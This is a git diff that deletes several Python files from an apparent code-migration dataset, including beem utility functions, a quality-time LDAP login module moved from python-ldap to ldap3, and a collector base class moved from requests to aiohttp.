author=author, permlink=permlink) - return "{prefix}{author}/{permlink}".format(**fields) - - -def resolve_root_identifier(url): - m = re.match(r"/([^/]*)/@([^/]*)/([^#]*).*", url) - if not m: - return "", "" - else: - category = m.group(1) - author = m.group(2) - permlink = m.group(3) - return construct_authorperm(author, permlink), category - - -def resolve_authorpermvoter(identifier): - """Correctly split a string containing an authorpermvoter. - - Splits the string into author and permlink with the - following separator: ``/`` and ``|``. 
- """ - pos = identifier.find("|") - if pos < 0: - raise ValueError("Invalid identifier") - [author, permlink] = resolve_authorperm(identifier[:pos]) - return author, permlink, identifier[pos + 1 :] - - -def construct_authorpermvoter(*args): - """ Create a vote identifier from vote object or arguments. - Examples: - - .. code-block:: python - - >>> from beem.utils import construct_authorpermvoter - >>> print(construct_authorpermvoter('username', 'permlink', 'voter')) - @username/permlink|voter - >>> print(construct_authorpermvoter({'author': 'username', 'permlink': 'permlink', 'voter': 'voter'})) - @username/permlink|voter - - """ - username_prefix = "@" - if len(args) == 1: - op = args[0] - if "authorperm" in op: - authorperm, voter = op["authorperm"], op["voter"] - [author, permlink] = resolve_authorperm(authorperm) - else: - author, permlink, voter = op["author"], op["permlink"], op["voter"] - elif len(args) == 2: - authorperm, voter = args - [author, permlink] = resolve_authorperm(authorperm) - elif len(args) == 3: - author, permlink, voter = args - else: - raise ValueError("construct_identifier() received unparsable arguments") - - fields = dict(prefix=username_prefix, author=author, permlink=permlink, voter=voter) - return "{prefix}{author}/{permlink}|{voter}".format(**fields) - - -def reputation_to_score(rep): - """Converts the account reputation value into the reputation score""" - if isinstance(rep, str): - rep = int(rep) - if rep == 0: - return 25.0 - score = max([math.log10(abs(rep)) - 9, 0]) - if rep < 0: - score *= -1 - score = (score * 9.0) + 25.0 - return score - - -def remove_from_dict(obj, keys=list(), keep_keys=True): - """ Prune a class or dictionary of all but keys (keep_keys=True). - Prune a class or dictionary of specified keys.(keep_keys=False). 
- """ - if type(obj) == dict: - items = list(obj.items()) - elif isinstance(obj, dict): - items = list(obj.items()) - else: - items = list(obj.__dict__.items()) - if keep_keys: - return {k: v for k, v in items if k in keys} - else: - return {k: v for k, v in items if k not in keys} - - -def make_patch(a, b, n=3): - # _no_eol = '\n' + "\ No newline at end of file" + '\n' - _no_eol = "\n" - diffs = difflib.unified_diff(a.splitlines(True), b.splitlines(True), n=n) - try: - _, _ = next(diffs), next(diffs) - del _ - except StopIteration: - pass - return "".join([d if d[-1] == "\n" else d + _no_eol for d in diffs]) - - -def findall_patch_hunks(body=None): - return RE_HUNK_HEADER.findall(body) - - -def derive_beneficiaries(beneficiaries): - beneficiaries_list = [] - beneficiaries_accounts = [] - beneficiaries_sum = 0 - if not isinstance(beneficiaries, list): - beneficiaries = beneficiaries.split(",") - - for w in beneficiaries: - account_name = w.strip().split(":")[0] - if account_name[0] == "@": - account_name = account_name[1:] - if account_name in beneficiaries_accounts: - continue - if w.find(":") == -1: - percentage = -1 - else: - percentage = w.strip().split(":")[1] - if "%" in percentage: - percentage = percentage.strip().split("%")[0].strip() - percentage = float(percentage) - beneficiaries_sum += percentage - beneficiaries_list.append( - {"account": account_name, "weight": int(percentage * 100)} - ) - beneficiaries_accounts.append(account_name) - - missing = 0 - for bene in beneficiaries_list: - if bene["weight"] < 0: - missing += 1 - index = 0 - for bene in beneficiaries_list: - if bene["weight"] < 0: - beneficiaries_list[index]["weight"] = int( - (int(100 * 100) - int(beneficiaries_sum * 100)) / missing - ) - index += 1 - sorted_beneficiaries = sorted( - beneficiaries_list, key=lambda beneficiaries_list: beneficiaries_list["account"] - ) - return sorted_beneficiaries - - -def derive_tags(tags): - tags_list = [] - if len(tags.split(",")) > 1: - for tag in tags.split(","): - tags_list.append(tag.strip()) - elif len(tags.split(" ")) > 1: - for tag in tags.split(" "): - tags_list.append(tag.strip()) - elif len(tags) > 0: - tags_list.append(tags.strip()) - return tags_list - - -def seperate_yaml_dict_from_body(content): - parameter = {} - body = "" - if len(content.split("---\n")) > 1: - body = content[content.find("---\n", 1) + 4 :] - yaml_content = content[content.find("---\n") + 4 : content.find("---\n", 1)] - yaml=YAML(typ="safe") - parameter = yaml.load(yaml_content) - if not isinstance(parameter, dict): - parameter = yaml.load(yaml_content.replace(":", ": ").replace(" ", " ")) - else: - body = content - return body, parameter - - -def load_dirty_json(dirty_json): - regex_replace = [(r"([ \{,:\[])(u)?'([^']+)'", r'\1"\3"'), (r" False([, \}\]])", r' false\1'), (r" True([, \}\]])", r' true\1')] - for r, s in regex_replace: - dirty_json = re.sub(r, s, dirty_json) - clean_json = json.loads(dirty_json) - return clean_json diff --git a/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.diff b/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.diff deleted file mode 100644 index 76f33ce..0000000 --- a/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.diff +++ /dev/null @@ -1,95 +0,0 @@ -diff --git a/components/server/src/routes/auth.py b/components/server/src/routes/auth.py - index 23a4525b4f703b39a097fc8f4e3a7846aa7e1e72..cc47b42cf70b6968b22a3819bf0b9714135271c1 100644 - --- 
a/components/server/src/routes/auth.py - +++ b/components/server/src/routes/auth.py -@@ -6,14 +6,16 @@ import os - import re - from typing import cast, Dict, Tuple - import urllib.parse -+import hashlib -+import base64 - - from pymongo.database import Database --import ldap --import bottle -+from ldap3 import Server, Connection, ALL -+from ldap3.core import exceptions - -+import bottle - from database import sessions - from utilities.functions import uuid --from utilities.ldap import LDAPObject - from utilities.type import SessionId - - -@@ -31,12 +33,27 @@ def set_session_cookie(session_id: str, expires_datetime: datetime) -> None: - options["domain"] = domain - bottle.response.set_cookie("session_id", session_id, **options) - -+def check_password(ssha_ldap_salted_password, password): -+ """Checks the OpenLDAP tagged digest against the given password""" -+ -+ if ssha_ldap_salted_password[:6] != b'{SSHA}': -+ logging.warning("Only SSHA LDAP password digest supported!") -+ raise exceptions.LDAPInvalidAttributeSyntaxResult -+ -+ digest_salt_b64 = ssha_ldap_salted_password[6:] # strip {SSHA} -+ -+ digest_salt = base64.b64decode(digest_salt_b64) -+ digest = digest_salt[:20] -+ salt = digest_salt[20:] -+ -+ sha = hashlib.sha1(bytes(password, 'utf-8')) #nosec -+ sha.update(salt) #nosec -+ -+ return digest == sha.digest() - - @bottle.post("/login") - def login(database: Database) -> Dict[str, bool]: - """Log the user in.""" -- # Pylint can't find the ldap.* constants for some reason, turn off the error message: -- # pylint: disable=no-member - credentials = dict(bottle.request.json) - unsafe_characters = re.compile(r"[^\w ]+", re.UNICODE) - username = re.sub(unsafe_characters, "", credentials.get("username", "no username given")) -@@ -44,23 +61,25 @@ def login(database: Database) -> Dict[str, bool]: - ldap_url = os.environ.get("LDAP_URL", "ldap://localhost:389") - ldap_lookup_user = os.environ.get("LDAP_LOOKUP_USER", "admin") - ldap_lookup_user_password = os.environ.get("LDAP_LOOKUP_USER_PASSWORD", "admin") -- ldap_server = ldap.initialize(ldap_url) -+ - try: -- ldap_server.simple_bind_s(f"cn={ldap_lookup_user},{ldap_root_dn}", ldap_lookup_user_password) -- result = ldap_server.search_s( -- ldap_root_dn, ldap.SCOPE_SUBTREE, f"(|(uid={username})(cn={username}))", ['dn', 'uid', 'cn']) -- if result: -- logging.info("LDAP search result: %s", result) -- username = LDAPObject(result[0][1]).cn -- else: -- raise ldap.INVALID_CREDENTIALS -- ldap_server.simple_bind_s(f"cn={username},{ldap_root_dn}", credentials.get("password")) -- except (ldap.INVALID_CREDENTIALS, ldap.UNWILLING_TO_PERFORM, ldap.INVALID_DN_SYNTAX, -- ldap.SERVER_DOWN) as reason: -- logging.warning("Couldn't bind cn=%s,%s: %s", username, ldap_root_dn, reason) -+ ldap_server = Server(ldap_url, get_info=ALL) -+ with Connection(ldap_server, -+ user=f"cn={ldap_lookup_user},{ldap_root_dn}", password=ldap_lookup_user_password) as conn: -+ if not conn.bind(): -+ username = ldap_lookup_user -+ raise exceptions.LDAPBindError -+ -+ conn.search(ldap_root_dn, f"(|(uid={username})(cn={username}))", attributes=['userPassword']) -+ result = conn.entries[0] -+ password = credentials.get("password", "no password given") -+ if not check_password(result.userPassword.value, password): -+ return dict(ok=False) -+ -+ except Exception as reason: # pylint: disable=broad-except -+ logging.warning("LDAP error for cn=%s,%s: %s", username, ldap_root_dn, reason) - return dict(ok=False) -- finally: -- ldap_server.unbind_s() -+ - session_id, session_expiration_datetime = 
generate_session() - sessions.upsert(database, username, session_id, session_expiration_datetime) - set_session_cookie(session_id, session_expiration_datetime) diff --git a/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.source.py b/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.source.py deleted file mode 100644 index 4645ceb..0000000 --- a/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.source.py +++ /dev/null @@ -1,76 +0,0 @@ -"""Login/logout.""" - -from datetime import datetime, timedelta -import logging -import os -import re -from typing import cast, Dict, Tuple -import urllib.parse - -from pymongo.database import Database -import ldap -import bottle - -from database import sessions -from utilities.functions import uuid -from utilities.ldap import LDAPObject -from utilities.type import SessionId - - -def generate_session() -> Tuple[SessionId, datetime]: - """Generate a new random, secret and unique session id and a session expiration datetime.""" - return cast(SessionId, uuid()), datetime.now() + timedelta(hours=24) - - -def set_session_cookie(session_id: str, expires_datetime: datetime) -> None: - """Set the session cookie on the response. To clear the cookie, pass an expiration datetime of datetime.min.""" - options = dict(expires=expires_datetime, path="/", httponly=True) - server_url = os.environ.get("SERVER_URL", "http://localhost:5001") - domain = urllib.parse.urlparse(server_url).netloc.split(":")[0] - if domain != "localhost": - options["domain"] = domain - bottle.response.set_cookie("session_id", session_id, **options) - - -@bottle.post("/login") -def login(database: Database) -> Dict[str, bool]: - """Log the user in.""" - # Pylint can't find the ldap.* constants for some reason, turn off the error message: - # pylint: disable=no-member - credentials = dict(bottle.request.json) - unsafe_characters = re.compile(r"[^\w ]+", re.UNICODE) - username = re.sub(unsafe_characters, "", credentials.get("username", "no username given")) - ldap_root_dn = os.environ.get("LDAP_ROOT_DN", "dc=example,dc=org") - ldap_url = os.environ.get("LDAP_URL", "ldap://localhost:389") - ldap_lookup_user = os.environ.get("LDAP_LOOKUP_USER", "admin") - ldap_lookup_user_password = os.environ.get("LDAP_LOOKUP_USER_PASSWORD", "admin") - ldap_server = ldap.initialize(ldap_url) - try: - ldap_server.simple_bind_s(f"cn={ldap_lookup_user},{ldap_root_dn}", ldap_lookup_user_password) - result = ldap_server.search_s( - ldap_root_dn, ldap.SCOPE_SUBTREE, f"(|(uid={username})(cn={username}))", ['dn', 'uid', 'cn']) - if result: - logging.info("LDAP search result: %s", result) - username = LDAPObject(result[0][1]).cn - else: - raise ldap.INVALID_CREDENTIALS - ldap_server.simple_bind_s(f"cn={username},{ldap_root_dn}", credentials.get("password")) - except (ldap.INVALID_CREDENTIALS, ldap.UNWILLING_TO_PERFORM, ldap.INVALID_DN_SYNTAX, - ldap.SERVER_DOWN) as reason: - logging.warning("Couldn't bind cn=%s,%s: %s", username, ldap_root_dn, reason) - return dict(ok=False) - finally: - ldap_server.unbind_s() - session_id, session_expiration_datetime = generate_session() - sessions.upsert(database, username, session_id, session_expiration_datetime) - set_session_cookie(session_id, session_expiration_datetime) - return dict(ok=True) - - -@bottle.post("/logout") -def logout(database: Database) -> Dict[str, bool]: - """Log the user out.""" - session_id = cast(SessionId, str(bottle.request.get_cookie("session_id"))) - 
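
# The auth.py pair here replaces python-ldap binds with an ldap3 lookup plus a
# local check of the OpenLDAP {SSHA} userPassword digest. A standalone sketch
# of that check (function name invented; logic follows check_password above):
import base64
import hashlib


def check_ssha(tagged_digest: bytes, password: str) -> bool:
    # {SSHA} stores base64(sha1(password + salt) + salt); SHA-1 digests are 20 bytes.
    if not tagged_digest.startswith(b"{SSHA}"):
        raise ValueError("only SSHA digests are supported")
    digest_salt = base64.b64decode(tagged_digest[6:])
    digest, salt = digest_salt[:20], digest_salt[20:]
    return hashlib.sha1(password.encode("utf-8") + salt).digest() == digest  # nosec
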
sessions.delete(database, session_id) - set_session_cookie(session_id, datetime.min) - return dict(ok=True) diff --git a/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.target.py b/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.target.py deleted file mode 100644 index e8859c9..0000000 --- a/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.target.py +++ /dev/null @@ -1,95 +0,0 @@ -"""Login/logout.""" - -from datetime import datetime, timedelta -import logging -import os -import re -from typing import cast, Dict, Tuple -import urllib.parse -import hashlib -import base64 - -from pymongo.database import Database -from ldap3 import Server, Connection, ALL -from ldap3.core import exceptions - -import bottle -from database import sessions -from utilities.functions import uuid -from utilities.type import SessionId - - -def generate_session() -> Tuple[SessionId, datetime]: - """Generate a new random, secret and unique session id and a session expiration datetime.""" - return cast(SessionId, uuid()), datetime.now() + timedelta(hours=24) - - -def set_session_cookie(session_id: str, expires_datetime: datetime) -> None: - """Set the session cookie on the response. To clear the cookie, pass an expiration datetime of datetime.min.""" - options = dict(expires=expires_datetime, path="/", httponly=True) - server_url = os.environ.get("SERVER_URL", "http://localhost:5001") - domain = urllib.parse.urlparse(server_url).netloc.split(":")[0] - if domain != "localhost": - options["domain"] = domain - bottle.response.set_cookie("session_id", session_id, **options) - -def check_password(ssha_ldap_salted_password, password): - """Checks the OpenLDAP tagged digest against the given password""" - - if ssha_ldap_salted_password[:6] != b'{SSHA}': - logging.warning("Only SSHA LDAP password digest supported!") - raise exceptions.LDAPInvalidAttributeSyntaxResult - - digest_salt_b64 = ssha_ldap_salted_password[6:] # strip {SSHA} - - digest_salt = base64.b64decode(digest_salt_b64) - digest = digest_salt[:20] - salt = digest_salt[20:] - - sha = hashlib.sha1(bytes(password, 'utf-8')) #nosec - sha.update(salt) #nosec - - return digest == sha.digest() - -@bottle.post("/login") -def login(database: Database) -> Dict[str, bool]: - """Log the user in.""" - credentials = dict(bottle.request.json) - unsafe_characters = re.compile(r"[^\w ]+", re.UNICODE) - username = re.sub(unsafe_characters, "", credentials.get("username", "no username given")) - ldap_root_dn = os.environ.get("LDAP_ROOT_DN", "dc=example,dc=org") - ldap_url = os.environ.get("LDAP_URL", "ldap://localhost:389") - ldap_lookup_user = os.environ.get("LDAP_LOOKUP_USER", "admin") - ldap_lookup_user_password = os.environ.get("LDAP_LOOKUP_USER_PASSWORD", "admin") - - try: - ldap_server = Server(ldap_url, get_info=ALL) - with Connection(ldap_server, - user=f"cn={ldap_lookup_user},{ldap_root_dn}", password=ldap_lookup_user_password) as conn: - if not conn.bind(): - username = ldap_lookup_user - raise exceptions.LDAPBindError - - conn.search(ldap_root_dn, f"(|(uid={username})(cn={username}))", attributes=['userPassword']) - result = conn.entries[0] - password = credentials.get("password", "no password given") - if not check_password(result.userPassword.value, password): - return dict(ok=False) - - except Exception as reason: # pylint: disable=broad-except - logging.warning("LDAP error for cn=%s,%s: %s", username, ldap_root_dn, reason) - return dict(ok=False) - - session_id, 
session_expiration_datetime = generate_session() - sessions.upsert(database, username, session_id, session_expiration_datetime) - set_session_cookie(session_id, session_expiration_datetime) - return dict(ok=True) - - -@bottle.post("/logout") -def logout(database: Database) -> Dict[str, bool]: - """Log the user out.""" - session_id = cast(SessionId, str(bottle.request.get_cookie("session_id"))) - sessions.delete(database, session_id) - set_session_cookie(session_id, datetime.min) - return dict(ok=True) diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.diff b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.diff deleted file mode 100644 index 75ede7b..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.diff +++ /dev/null @@ -1,281 +0,0 @@ -diff --git a/components/collector/src/source_collectors/source_collector.py b/components/collector/src/base_collectors/source_collector.py - index 6df08864df270b6956cc78502aa3d9c0446038d5..d3a9a16a72348cece48c9788cf10db6cc043ec7c 100644 - --- a/components/collector/src/source_collectors/source_collector.py - +++ b/components/collector/src/base_collectors/source_collector.py -@@ -1,32 +1,32 @@ - """Source collector base classes.""" - --import io -+import asyncio -+import json - import logging - import traceback - import urllib --import zipfile - from abc import ABC, abstractmethod - from datetime import datetime - from http import HTTPStatus --from typing import cast, Dict, Final, List, Optional, Set, Tuple, Type, Union -+from typing import cast, Any, Dict, Final, List, Optional, Set, Tuple, Type, Union - --import requests -+import aiohttp - - from collector_utilities.functions import days_ago, tokenless, stable_traceback --from collector_utilities.type import ErrorMessage, Entities, Measurement, Response, Responses, URL, Value -+from collector_utilities.type import ErrorMessage, Entities, JSON, Measurement, Response, Responses, URL, Value - - - class SourceCollector(ABC): - """Base class for source collectors. Source collectors are subclasses of this class that know how to collect the - measurement data for one specific metric from one specific source.""" - -- TIMEOUT = 10 # Default timeout of 10 seconds - MAX_ENTITIES = 100 # The maximum number of entities (e.g. 
violations, warnings) to send to the server - API_URL_PARAMETER_KEY = "url" - source_type = "" # The source type is set on the subclass, when the subclass is registered - subclasses: Set[Type["SourceCollector"]] = set() - -- def __init__(self, source, datamodel) -> None: -+ def __init__(self, session: aiohttp.ClientSession, source, datamodel) -> None: -+ self._session = session - self._datamodel: Final = datamodel - self.__parameters: Final[Dict[str, Union[str, List[str]]]] = source.get("parameters", {}) - -@@ -45,30 +45,22 @@ class SourceCollector(ABC): - return matching_subclasses[0] - raise LookupError(f"Couldn't find collector subclass for source {source_type} and metric {metric_type}") - -- def get(self) -> Measurement: -+ async def get(self) -> Measurement: - """Return the measurement from this source.""" -- responses, api_url, connection_error = self.__safely_get_source_responses() -- value, total, entities, parse_error = self.__safely_parse_source_responses(responses) -- landing_url = self._landing_url(responses) -+ responses, api_url, connection_error = await self.__safely_get_source_responses() -+ value, total, entities, parse_error = await self.__safely_parse_source_responses(responses) -+ landing_url = await self.__safely_parse_landing_url(responses) - return dict(api_url=api_url, landing_url=landing_url, value=value, total=total, entities=entities, - connection_error=connection_error, parse_error=parse_error) - -- def _landing_url(self, responses: Responses) -> URL: # pylint: disable=unused-argument -- """Return the user supplied landing url parameter if there is one, otherwise translate the url parameter into -- a default landing url.""" -- if landing_url := cast(str, self.__parameters.get("landing_url", "")).rstrip("/"): -- return URL(landing_url) -- url = cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/") -- return URL(url[:-(len("xml"))] + "html" if url.endswith(".xml") else url) -- -- def _api_url(self) -> URL: -+ async def _api_url(self) -> URL: - """Translate the url parameter into the API url.""" - return URL(cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/")) - - def _parameter(self, parameter_key: str, quote: bool = False) -> Union[str, List[str]]: - """Return the parameter value.""" - -- def quote_if_needed(parameter_value): -+ def quote_if_needed(parameter_value: str) -> str: - """Quote the string if needed.""" - return urllib.parse.quote(parameter_value, safe="") if quote else parameter_value - -@@ -84,30 +76,30 @@ class SourceCollector(ABC): - value = cast(str, value).rstrip("/") - return quote_if_needed(value) if isinstance(value, str) else [quote_if_needed(v) for v in value] - -- def __safely_get_source_responses(self) -> Tuple[Responses, URL, ErrorMessage]: -+ async def __safely_get_source_responses(self) -> Tuple[Responses, URL, ErrorMessage]: - """Connect to the source and get the data, without failing. 
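
Aside: the {SSHA} scheme verified by check_password in the auth.py hunk earlier in this patch can be exercised stand-alone. A minimal sketch, assuming the usual layout of a 20-byte SHA-1 digest followed by the salt; the 4-byte salt and the helper names make_ssha/verify_ssha are illustrative, not part of the patch:

import base64
import hashlib
import os


def make_ssha(password: str) -> bytes:
    # Build a demo {SSHA} value: base64(sha1(password + salt) + salt).
    salt = os.urandom(4)
    digest = hashlib.sha1(password.encode("utf-8") + salt).digest()  # nosec, demo only
    return b"{SSHA}" + base64.b64encode(digest + salt)


def verify_ssha(tagged: bytes, password: str) -> bool:
    # Mirrors check_password: split digest and salt, re-hash, compare.
    if tagged[:6] != b"{SSHA}":
        raise ValueError("only SSHA digests are supported here")
    digest_salt = base64.b64decode(tagged[6:])
    digest, salt = digest_salt[:20], digest_salt[20:]  # SHA-1 digests are 20 bytes
    sha = hashlib.sha1(password.encode("utf-8"))  # nosec, matches the code above
    sha.update(salt)
    return digest == sha.digest()


assert verify_ssha(make_ssha("s3cret"), "s3cret")
assert not verify_ssha(make_ssha("s3cret"), "wrong")
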
This method should not be overridden - because it makes sure the collection of source data never causes the collector to fail.""" - responses: Responses = [] - api_url = URL("") - error = None - try: -- responses = self._get_source_responses(api_url := self._api_url()) -- for response in responses: -- response.raise_for_status() -+ responses = await self._get_source_responses(api_url := await self._api_url()) - logging.info("Retrieved %s", tokenless(api_url) or self.__class__.__name__) - except Exception as reason: # pylint: disable=broad-except - error = stable_traceback(traceback.format_exc()) - logging.warning("Failed to retrieve %s: %s", tokenless(api_url) or self.__class__.__name__, reason) - return responses, api_url, error - -- def _get_source_responses(self, api_url: URL) -> Responses: -- """Open the url. Can be overridden if a post request is needed or multiple requests need to be made.""" -- return [ -- requests.get(api_url, timeout=self.TIMEOUT, auth=self._basic_auth_credentials(), headers=self._headers())] -- -- def _headers(self) -> Dict[str, str]: # pylint: disable=no-self-use -- """Return the headers for the request.""" -- return dict() -+ async def _get_source_responses(self, *urls: URL) -> Responses: -+ """Open the url. Can be overridden if a post request is needed or serial requests need to be made.""" -+ kwargs: Dict[str, Any] = dict() -+ credentials = self._basic_auth_credentials() -+ if credentials is not None: -+ kwargs["auth"] = aiohttp.BasicAuth(credentials[0], credentials[1]) -+ if headers := self._headers(): -+ kwargs["headers"] = headers -+ tasks = [self._session.get(url, **kwargs) for url in urls] -+ return list(await asyncio.gather(*tasks)) - - def _basic_auth_credentials(self) -> Optional[Tuple[str, str]]: - """Return the basic authentication credentials, if any.""" -@@ -117,7 +109,11 @@ class SourceCollector(ABC): - password = cast(str, self.__parameters.get("password", "")) - return (username, password) if username and password else None - -- def __safely_parse_source_responses( -+ def _headers(self) -> Dict[str, str]: # pylint: disable=no-self-use -+ """Return the headers for the get request.""" -+ return {} -+ -+ async def __safely_parse_source_responses( - self, responses: Responses) -> Tuple[Value, Value, Entities, ErrorMessage]: - """Parse the data from the responses, without failing. This method should not be overridden because it - makes sure that the parsing of source data never causes the collector to fail.""" -@@ -125,95 +121,72 @@ class SourceCollector(ABC): - value, total, error = None, None, None - if responses: - try: -- value, total, entities = self._parse_source_responses(responses) -+ value, total, entities = await self._parse_source_responses(responses) - except Exception: # pylint: disable=broad-except - error = stable_traceback(traceback.format_exc()) - return value, total, entities[:self.MAX_ENTITIES], error - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - """Parse the responses to get the measurement value, the total value, and the entities for the metric. - This method can be overridden by collectors to parse the retrieved sources data.""" - # pylint: disable=assignment-from-none,no-self-use,unused-argument - return None, "100", [] # pragma nocover - -+ async def __safely_parse_landing_url(self, responses: Responses) -> URL: -+ """Parse the responses to get the landing url, without failing. 
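
The replacement _get_source_responses above builds optional auth kwargs and fans the GETs out with asyncio.gather. A stripped-down sketch of the same pattern (needs network access; the URLs and credentials are placeholders):

import asyncio

import aiohttp


async def fetch_all(urls, username="user", password="pass"):
    # Optional kwargs, as in _get_source_responses above.
    kwargs = dict(auth=aiohttp.BasicAuth(username, password))
    async with aiohttp.ClientSession() as session:
        # One GET per url, awaited concurrently.
        responses = await asyncio.gather(*(session.get(url, **kwargs) for url in urls))
        for response in responses:
            print(response.status, len(await response.text()))


asyncio.run(fetch_all(["https://example.org", "https://example.org/robots.txt"]))
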
This method should not be overridden because -+ it makes sure that the parsing of source data never causes the collector to fail.""" -+ try: -+ return await self._landing_url(responses) -+ except Exception: # pylint: disable=broad-except -+ return await self._api_url() - --class FileSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method -- """Base class for source collectors that retrieve files.""" -- -- file_extensions: List[str] = [] # Subclass responsibility -- -- def _get_source_responses(self, api_url: URL) -> Responses: -- responses = super()._get_source_responses(api_url) -- if not api_url.endswith(".zip"): -- return responses -- unzipped_responses = [] -- for response in responses: -- unzipped_responses.extend(self.__unzip(response)) -- return unzipped_responses -- -- def _headers(self) -> Dict[str, str]: -- headers = super()._headers() -- if token := cast(str, self._parameter("private_token")): -- # GitLab needs this header, see -- # https://docs.gitlab.com/ee/api/jobs.html#download-a-single-artifact-file-by-job-id -- headers["Private-Token"] = token -- return headers -- -- @classmethod -- def __unzip(cls, response: Response) -> Responses: -- """Unzip the response content and return a (new) response for each applicable file in the zip archive.""" -- responses = [] -- with zipfile.ZipFile(io.BytesIO(response.content)) as response_zipfile: -- names = [name for name in response_zipfile.namelist() if name.split(".")[-1].lower() in cls.file_extensions] -- for name in names: -- unzipped_response = requests.Response() -- unzipped_response.raw = io.BytesIO(response_zipfile.read(name)) -- unzipped_response.status_code = HTTPStatus.OK -- responses.append(unzipped_response) -- return responses -- -- --class HTMLFileSourceCollector(FileSourceCollector, ABC): # pylint: disable=abstract-method -- """Base class for source collectors that retrieve HTML files.""" -- -- file_extensions = ["html", "htm"] -- -+ async def _landing_url(self, responses: Responses) -> URL: # pylint: disable=unused-argument -+ """Return the user supplied landing url parameter if there is one, otherwise translate the url parameter into -+ a default landing url.""" -+ if landing_url := cast(str, self.__parameters.get("landing_url", "")).rstrip("/"): -+ return URL(landing_url) -+ url = cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/") -+ return URL(url[:-(len("xml"))] + "html" if url.endswith(".xml") else url) - --class JSONFileSourceCollector(FileSourceCollector, ABC): # pylint: disable=abstract-method -- """Base class for source collectors that retrieve JSON files.""" - -- file_extensions = ["json"] -+class FakeResponse: # pylint: disable=too-few-public-methods -+ """Fake a response because aiohttp.ClientResponse can not easily be instantiated directly. 
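
FakeResponse works because the parse methods only ever await .json() or .text() on a response object. A self-contained sketch of that duck-typing, with an invented payload:

import asyncio
import json


class FakeResponse:
    """Stand-in for aiohttp.ClientResponse, as in the class above."""

    status = 200

    def __init__(self, contents: bytes = b"") -> None:
        self.contents = contents

    async def json(self):
        return json.loads(self.contents)

    async def text(self) -> str:
        return self.contents.decode()


async def parse_value(response) -> str:
    # A parser only needs the awaitable accessors, not a real connection.
    return str((await response.json())["value"])


print(asyncio.run(parse_value(FakeResponse(b'{"value": 42}'))))  # prints 42
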
""" -+ status = HTTPStatus.OK - -+ def __init__(self, contents: bytes = bytes()) -> None: -+ super().__init__() -+ self.contents = contents - --class XMLFileSourceCollector(FileSourceCollector, ABC): # pylint: disable=abstract-method -- """Base class for source collectors that retrieve XML files.""" -+ async def json(self) -> JSON: -+ """Return the JSON version of the contents.""" -+ return cast(JSON, json.loads(self.contents)) - -- file_extensions = ["xml"] -+ async def text(self) -> str: -+ """Return the text version of the contents.""" -+ return str(self.contents.decode()) - - - class LocalSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that do not need to access the network but return static or user-supplied - data.""" - -- def _get_source_responses(self, api_url: URL) -> Responses: -- fake_response = requests.Response() -- fake_response.status_code = HTTPStatus.OK -- return [fake_response] # Return a fake response so that the parse methods will be called -+ async def _get_source_responses(self, *urls: URL) -> Responses: -+ return [cast(Response, FakeResponse())] # Return a fake response so that the parse methods will be called - - - class UnmergedBranchesSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for unmerged branches source collectors.""" - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - entities = [ - dict(key=branch["name"], name=branch["name"], commit_age=str(days_ago(self._commit_datetime(branch))), - commit_date=str(self._commit_datetime(branch).date())) -- for branch in self._unmerged_branches(responses)] -+ for branch in await self._unmerged_branches(responses)] - return str(len(entities)), "100", entities - - @abstractmethod -- def _unmerged_branches(self, responses: Responses) -> List: -- """Return the list of unmerged branch.""" -+ async def _unmerged_branches(self, responses: Responses) -> List[Dict[str, Any]]: -+ """Return the list of unmerged branches.""" - - @abstractmethod - def _commit_datetime(self, branch) -> datetime: -@@ -223,9 +196,10 @@ class UnmergedBranchesSourceCollector(SourceCollector, ABC): # pylint: disable= - class SourceUpToDatenessCollector(SourceCollector): - """Base class for source up-to-dateness collectors.""" - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -- return str(days_ago(min(self._parse_source_response_date_time(response) for response in responses))), "100", [] -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ date_times = await asyncio.gather(*[self._parse_source_response_date_time(response) for response in responses]) -+ return str(days_ago(min(date_times))), "100", [] - -- def _parse_source_response_date_time(self, response: Response) -> datetime: -+ async def _parse_source_response_date_time(self, response: Response) -> datetime: - """Parse the date time from the source.""" - raise NotImplementedError # pragma: nocover diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.source.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.source.py deleted file mode 100644 index 0017516..0000000 --- 
